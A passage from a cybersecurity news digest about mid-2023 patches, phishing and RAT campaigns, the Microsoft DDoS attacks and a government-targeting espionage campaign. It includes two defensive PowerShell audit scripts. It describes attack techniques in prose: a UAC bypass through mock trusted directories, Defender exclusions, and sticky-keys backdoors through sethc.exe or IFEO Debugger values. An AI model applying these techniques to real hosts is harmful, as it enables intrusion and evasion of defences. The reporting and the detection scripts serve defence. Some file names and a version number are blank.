iOS 15.7.7 and iPadOS 15.7.7: iPhone 6s, iPhone 7, iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), iPod touch (7th generation)

macOS Ventura 13.4.1, macOS Monterey 12.6.7, and macOS Big Sur 11.7.8

watchOS 9.5.2: Apple Watch Series 4 and later

watchOS 8.8.1: Apple Watch Series 3, 4, 5, 6, 7, and SE

Safari 16.5.1: Macs running macOS Big Sur and macOS Monterey

Apple's Ongoing Security Efforts: With these latest fixes, Apple has addressed a total of nine zero-day vulnerabilities in its products since the beginning of the year. The company has demonstrated its commitment to swiftly patching identified security flaws, strengthening its overall security posture.

Conclusion: Apple's release of updates to address actively exploited vulnerabilities underscores the importance of promptly updating devices to protect against potential attacks. Users are urged to install the provided patches and stay vigilant regarding future security updates. Apple's ongoing efforts to address vulnerabilities contribute to a safer digital ecosystem for its users.

Asus Issues Urgent Firmware Updates to Address WiFi Router Vulnerabilities


Taiwanese computer hardware manufacturer Asus has released critical firmware updates for its WiFi router product lines to address security vulnerabilities. The company warns users about the potential risk of remote code execution attacks and advises taking immediate action.

Vulnerabilities and Fixes: Asus has identified at least nine security defects and multiple weaknesses in its routers that could lead to code execution, denial-of-service, information disclosure, and authentication bypasses. One of the most severe vulnerabilities, with a CVSS severity rating of 9.8/10, dates back to 2018 and exposes routers to code execution attacks.

The specific vulnerability, known as CVE-2018-1160, involves a memory corruption issue in Netatalk before version 3.1.12. According to the advisory, the lack of bounds checking on attacker-controlled data enables remote unauthenticated attackers to execute arbitrary code.

In addition, Asus has addressed CVE-2022-26376 (CVSS 9.8/10), a memory corruption vulnerability in the httpd unescape functionality of Asuswrt prior to version and Asuswrt-Merlin New Gen prior to version 386.7. This vulnerability can be triggered by a specially-crafted HTTP request, leading to memory corruption.

Affected Routers and Recommendations: Asus has provided a list of affected WiFi routers, including models such as Asus GT6, GT-AXE16000, GT-AX11000 PRO, GT-AX6000, GT-AX11000, GS-AX5400, GS-AX3000, XT9, XT8, XT8 V2, RT-AX86U PRO, RT-AX86U, RT-AX86S, RT-AX82U, RT-AX58U, RT-AX3000, TUF-AX6000, and TUF-AX5400.

To mitigate the risks, Asus advises users who choose not to install the new firmware version to disable services accessible from the WAN side. This includes remote access from WAN, port forwarding, DDNS, VPN server, DMZ, and port trigger. The company strongly recommends periodically auditing both equipment and security procedures to enhance protection against malware attacks targeting router infrastructure. Users are also urged to update their routers to the latest firmware and set up separate passwords for wireless networks and router-administration pages.

Conclusion: Asus has taken swift action by releasing urgent firmware updates to address security vulnerabilities in its WiFi routers. Users are encouraged to promptly install the updates and follow the recommended security measures to safeguard their router infrastructure and protect against potential attacks.

MULTI#STORM Campaign: Phishing Attacks Deploy Remote Access Trojans in India and the U.S.


A new phishing campaign named MULTI#STORM has emerged, targeting India and the U.S. This campaign employs JavaScript files to deliver remote access trojans (RATs) on compromised systems, leading to potential data breaches and unauthorized access.

Attack Details: According to researchers at Securonix, the attack chain of MULTI#STORM involves infecting victim machines with multiple unique RAT malware instances, such as Warzone RAT and Quasar RAT, which serve as command-and-control tools during various stages of the attack.

The attack begins with an email containing a link to a password-protected ZIP file named "," hosted on Microsoft OneDrive. The password for the ZIP file is set as "12345." Upon extracting the archive, a heavily obfuscated JavaScript file named "REQUEST.js" is revealed. Executing this file triggers the infection process by running two PowerShell commands. These commands retrieve separate payloads from OneDrive and execute them.

The first payload is a decoy PDF document presented to the victim, while the second payload is a Python-based executable that runs silently in the background. This binary acts as a dropper, extracting and executing the main payload, encoded as Base64 strings, named "Storm.exe." Additionally, the dropper establishes persistence by modifying the Windows Registry.

The binary also decodes a second ZIP file, "," containing four different files. These files bypass User Account Control (UAC) and escalate privileges by creating mock trusted directories (a copy of a system path whose name carries a trailing space), which UAC's trusted-path check can mistake for the real system directory so that a staged binary auto-elevates without a prompt. One of these files, named "check.bat," bears similarities to another loader called DBatLoader despite using a different programming language.

Another file, "KDECO.bat," executes a PowerShell command to instruct Microsoft Defender to add an antivirus exclusion rule, bypassing the scanning of the "C:\Users" directory. The final stage of the attack involves deploying Warzone RAT (also known as Ave Maria), a readily available malware sold for $38 per month. Warzone RAT provides extensive capabilities for data exfiltration and downloading additional malware, such as Quasar RAT.
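As an added example (not code from Securonix or from the MULTI#STORM toolset), the following PowerShell audits a Windows host for the three footprints the chain above leaves behind: a Defender exclusion covering a whole profile or system tree, a mock trusted directory under the system drive, and Run-key persistence that points into a user-writable location. The list of "broad" paths and the user-writable path patterns are assumptions for illustration.

```powershell
# Added example: audit Defender exclusions, mock trusted directories and Run-key
# persistence. The broad-path list and path patterns are assumptions; adjust
# them to your baseline.

# 1. Exclusions that cover whole trees defeat scanning for every file dropped beneath them.
$broadRoots = @("$env:SystemDrive\", "$env:SystemDrive\Users", $env:USERPROFILE,
                $env:TEMP, "$env:SystemDrive\Windows\Temp")
$prefs = Get-MpPreference
foreach ($ex in @($prefs.ExclusionPath)) {
    if (-not $ex) { continue }
    $norm = $ex.TrimEnd('\').ToLower()
    foreach ($root in $broadRoots) {
        if ($norm -eq $root.TrimEnd('\').ToLower()) { Write-Warning "Broad Defender path exclusion: $ex" }
    }
}
if (@($prefs.ExclusionProcess).Count -gt 0) {
    Write-Warning ("Process exclusions present: " + ($prefs.ExclusionProcess -join ', '))
}

# 2. A directory such as "C:\Windows \System32" (note the trailing space) cannot be
#    created through Explorer, so any root-level folder whose name ends in whitespace
#    is suspicious on its own. List what was staged inside it for triage.
Get-ChildItem -LiteralPath "$env:SystemDrive\" -Directory -Force -ErrorAction SilentlyContinue |
    Where-Object { $_.Name -match '\s$' } |
    ForEach-Object {
        Write-Warning "Mock trusted directory: '$($_.FullName)'"
        Get-ChildItem -LiteralPath $_.FullName -Recurse -File -Force -ErrorAction SilentlyContinue |
            Select-Object FullName, Length, LastWriteTime
    }

# 3. Run-key entries pointing into user-writable locations, the kind a dropper writes
#    so its payload survives a reboot.
$runKeys = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    foreach ($entry in ($props.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' })) {
        if ([string]$entry.Value -match '(?i)\\Users\\|\\AppData\\|\\Temp\\|\\ProgramData\\') {
            Write-Warning "Run entry '$($entry.Name)' points to user-writable path: $($entry.Value)"
        }
    }
}
```

Run it from an elevated prompt so the HKLM Run key and Defender preferences are readable. A Run entry under a user-writable path is not malicious by itself (many installers do this), so treat the output as a triage list to compare against a known baseline, not as a verdict.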

Conclusion: To protect against phishing attacks like MULTI#STORM, users must exercise heightened vigilance, especially when encountering emails that create a sense of urgency. It is crucial to avoid directly executing JavaScript files and remain cautious of shortcut files or those using double extensions, as they may have a higher success rate in exploiting unsuspecting victims.

New Version of Android GravityRAT Steals WhatsApp Backup Files


An updated variant of the Android GravityRAT malware has been discovered, targeting users through the BingeChat and Chatico messaging apps since August 2022. While the BingeChat campaign is still active, the Chatico campaign has ceased.
Attribution and Targeting: Researchers from ESET have associated the GravityRAT campaign with a group named SpaceCobra, although the actors behind the malware remain unidentified. The threat actor is believed to have connections to Pakistan and has previously targeted military personnel in India.

Campaign Overview: The malicious BingeChat app, distributed through the "bingechat[.]net" domain and potentially other channels, masquerades as a modified version of OMEMO IM—an authentic open-source instant messaging app for Android. The registration process for the malicious app is invite-based, requiring victims to provide valid credentials within a specified timeframe. Upon successful registration, BingeChat requests access to various permissions, including contacts, location, phone, SMS, storage, call logs, camera, and microphone.

Harmful Capabilities of GravityRAT: The latest iteration of GravityRAT spyware exhibits several harmful functionalities. It exfiltrates WhatsApp backups, deletes contacts, and erases call logs. Additionally, it steals media and document files in various formats, such as jpg, jpeg, log, png, PNG, JPG, JPEG, txt, pdf, xml, doc, xls, xlsx, and crypt32. The exfiltrated data is stored in text files on external storage media and transmitted to the command-and-control (C2) server before being removed from the victim's device.

Conclusion: The reappearance of GravityRAT highlights the ongoing activity of the threat actors behind this malware, who continuously enhance its capabilities to carry out sophisticated attacks. Notably, the new features primarily target mobile device users. It is essential for users to remain cautious when downloading apps from untrusted or third-party sources to mitigate the risk of infection.

Microsoft Confirms Cyberattacks Caused Disruptions to Outlook and Cloud Platform in Early June


Microsoft has revealed that the service disruptions experienced in early June 2023, affecting its flagship office suite, including Outlook email and OneDrive file-sharing apps, as well as its cloud computing platform, were the result of Layer 7 DDoS attacks. The attacks were carried out by a hacktivist group referred to as Storm-1359 by Microsoft. While the software giant confirmed the involvement of the group, it provided limited details about the impact and the number of affected customers. Microsoft assured users that no customer data was accessed or compromised during the attacks.

Attack Details and Attribution: Microsoft disclosed the nature of the attacks in a blog post following a request by The Associated Press. The post stated that the DDoS attacks temporarily affected the availability of some services. The attackers, known as Storm-1359 or Anonymous Sudan, aimed to disrupt and gain publicity. They likely utilized rented cloud infrastructure, virtual private networks, and botnets consisting of zombie computers to target Microsoft servers. While the group claimed responsibility on its Telegram social media channel, some security researchers suspect its affiliation to be Russian.

Impact and Response: The exact impact on customers remains unclear, as Microsoft did not publish specific figures. Although DDoS attacks are disruptive rather than a means of stealing data, an outage at a provider of Microsoft's scale ripples into global commerce. Without a detailed assessment from Microsoft, outside researchers cannot measure the full extent of the disruption; some resources were unreachable while others stayed up, so the impact varied by customer and region. Microsoft's reluctance to publish objective measures has been read by some observers as a sign that the incident was substantial.

Continued Threat and Recommendations: Microsoft's identification of the attackers as Storm-1359 indicates ongoing investigation into their affiliation. Pro-Russian hacking groups, including Killnet, have carried out similar DDoS attacks against Ukraine's allies. Analysts believe that Anonymous Sudan, despite its claims, is not located in Sudan but collaborates with pro-Kremlin groups to spread propaganda. The incident underscores the persistent risk posed by DDoS attacks, which remain an unsolved problem in cybersecurity. Experts emphasize the need for distributed services, such as content delivery networks, to absorb such attacks.

Chronology of Events: The disruptions to Microsoft 365 office suite services were first reported on June 5, with a peak of 18,000 outage and problem reports on Downdetector. Microsoft acknowledged the impact on Outlook, Microsoft Teams, SharePoint Online, and OneDrive for Business. The attacks persisted throughout the week, eventually affecting Microsoft's Azure cloud computing platform. On June 8, the cloud-based OneDrive file-hosting service experienced a global outage; desktop OneDrive clients remained unaffected.

Conclusion: The cyberattacks that targeted Microsoft's office suite and cloud platform in early June have been identified as Layer 7 DDoS attacks carried out by the hacktivist group tracked as Storm-1359, also known as Anonymous Sudan. While the attacks caused disruptions, Microsoft has assured users that no customer data was compromised. The incident highlights the ongoing threat of DDoS attacks and the need for organizations to implement robust defenses, such as distributed service architectures. As investigations continue, cybersecurity experts stress the importance of addressing the challenge posed by DDoS attacks to ensure the resilience of critical digital services.

Advanced Cyber-Espionage Campaign Targets Middle Eastern and African Governments


Governmental entities in the Middle East and Africa have fallen victim to a series of sophisticated cyber-espionage attacks employing advanced techniques aimed at stealing credentials and exfiltrating Exchange emails. Lior Rochberger, senior threat researcher at Palo Alto Networks, described the attacks as a "true advanced persistent threat," primarily focusing on obtaining highly sensitive information related to politicians, military activities, and foreign affairs. The campaign, tracked by Palo Alto Networks' Cortex Threat Research team under the temporary name CL-STA-0043, demonstrates the use of never-before-seen tactics and represents a significant state-backed cyber threat.

Attack Methodology: The attack campaign starts with the exploitation of vulnerabilities in on-premises Internet Information Services (IIS) and Microsoft Exchange servers, allowing the adversaries to infiltrate targeted networks. Palo Alto Networks identified instances where the attackers attempted to execute the China Chopper web shell but switched tactics to utilize an in-memory Visual Basic Script implant from the Exchange Server. Once a successful breach occurs, reconnaissance activities are conducted to identify critical servers housing valuable data, including domain controllers, web servers, Exchange servers, FTP servers, and SQL databases.

Privilege Escalation and Backdoor Access: CL-STA-0043 employs various methods to escalate privileges and gain persistent access to compromised environments. The threat actors abuse native Windows accessibility features such as "sticky keys" (sethc.exe) to bypass logon and establish a backdoor. They either replace the sethc.exe binary with a copy of cmd.exe or set the Image File Execution Options "Debugger" value for sethc.exe to cmd.exe; because the accessibility feature is invoked before anyone logs on, pressing Shift five times at the lock screen then yields a SYSTEM-level command prompt for running arbitrary commands. Similar tactics using the Utility Manager (utilman.exe) have been previously documented by CrowdStrike.

Innovative Techniques for Data Theft: In addition to leveraging Mimikatz for credential theft, the threat actors have employed novel methods for stealing passwords, lateral movement, and exfiltration of sensitive data. These techniques include executing a malicious DLL through network providers to harvest plaintext passwords and exporting them to a remote server. The attackers also utilize an open-source penetration testing toolset called Yasso to propagate across networks. Furthermore, they exploit the Exchange Management Shell and PowerShell snap-ins to gather emails of interest.
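As an added example (not code from Palo Alto Networks, and not part of the CL-STA-0043 toolset), the following PowerShell audits a Windows host for the two footholds described in the preceding two paragraphs: accessibility-binary backdoors (both the registry Debugger variant and the file-replacement variant) and a rogue network provider DLL registered to receive logon credentials. The list of accessibility binaries and the expectation that legitimate providers are Microsoft-signed and live under System32 are assumptions for illustration.

```powershell
# Added example: audit accessibility-binary backdoors and network-provider DLLs.
# The binary list and the "Microsoft-signed, under System32" expectation are assumptions.

$accessibility = 'sethc.exe', 'utilman.exe', 'osk.exe', 'narrator.exe',
                 'magnify.exe', 'displayswitch.exe', 'atbroker.exe'
$ifeo    = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$sys32   = "$env:SystemRoot\System32"
$cmdHash = (Get-FileHash -Algorithm SHA256 -LiteralPath "$sys32\cmd.exe").Hash

foreach ($bin in $accessibility) {
    # 1. Registry variant: a Debugger value under IFEO makes Windows launch that program
    #    instead of the accessibility tool, so cmd.exe opens at the logon screen.
    $key = Join-Path $ifeo $bin
    if (Test-Path -LiteralPath $key) {
        $dbg = (Get-ItemProperty -LiteralPath $key -ErrorAction SilentlyContinue).Debugger
        if ($dbg) { Write-Warning "IFEO Debugger set for ${bin}: $dbg" }
    }
    # 2. File-replacement variant: the binary was swapped for cmd.exe or for something
    #    that no longer carries a valid Microsoft signature.
    $path = Join-Path $sys32 $bin
    if (Test-Path -LiteralPath $path) {
        if ((Get-FileHash -Algorithm SHA256 -LiteralPath $path).Hash -eq $cmdHash) {
            Write-Warning "$bin is a byte-for-byte copy of cmd.exe"
        }
        $sig = Get-AuthenticodeSignature -LiteralPath $path
        if ($sig.Status -ne 'Valid' -or $sig.SignerCertificate.Subject -notmatch 'Microsoft') {
            Write-Warning "$bin signature check failed: $($sig.Status)"
        }
    }
}

# 3. Network providers: every DLL in ProviderOrder is handed the plaintext password at
#    logon through NPLogonNotify, so an unexpected provider is a credential harvester.
$orderKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order'
$providers = (Get-ItemProperty -LiteralPath $orderKey).ProviderOrder -split ','
foreach ($p in $providers) {
    $pKey = "HKLM:\SYSTEM\CurrentControlSet\Services\$p\NetworkProvider"
    if (-not (Test-Path -LiteralPath $pKey)) { continue }
    $dll = (Get-ItemProperty -LiteralPath $pKey).ProviderPath
    if (-not $dll) { Write-Warning "Provider '$p' has no ProviderPath"; continue }
    $expanded = [Environment]::ExpandEnvironmentVariables($dll)
    $sig = if (Test-Path -LiteralPath $expanded) { Get-AuthenticodeSignature -LiteralPath $expanded } else { $null }
    $ok  = $sig -and $sig.Status -eq 'Valid' -and
           $sig.SignerCertificate.Subject -match 'Microsoft' -and
           $expanded -like "$sys32\*"
    if ($ok) { Write-Verbose "Provider '$p' OK: $expanded" }
    else     { Write-Warning "Unexpected network provider '$p' -> $dll" }
}
```

Run it from an elevated prompt. Third-party VPN and remote-file-system clients legitimately register their own network providers, so a warning in section 3 means "not in the expected set", not "malicious"; compare it against the provider list captured from a known-clean build of the same image.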

Attribution and Implications: The level of sophistication, adaptiveness, and victimology displayed by CL-STA-0043 strongly suggests a highly capable APT actor, potentially operating on behalf of a nation-state. The campaign shares similarities with the activities of the Chinese state-sponsored group known as Silk Typhoon (formerly Hafnium), which targeted Microsoft Exchange Servers in 2021. The ongoing attacks pose significant cybersecurity risks to governments in the Middle East and Africa and highlight the need for enhanced defensive measures and threat intelligence sharing.

Conclusion: The cyber-espionage campaign targeting Middle Eastern and African governments showcases the evolving tactics and capabilities of state-backed threat actors. The exploitation of vulnerabilities, advanced credential theft techniques, and exfiltration of sensitive data emphasize the importance of robust cybersecurity strategies and proactive defenses. Governments and organizations must remain vigilant, adopt best security practices, and collaborate to mitigate the risks posed by these sophisticated cyber threats.

AT&T Data Breach: 73 Million Customers' Information Leaked, Company Confirms

AT&T has confirmed a data breach impacting 73 million current and former customers, despite initially denying that the leaked data origi...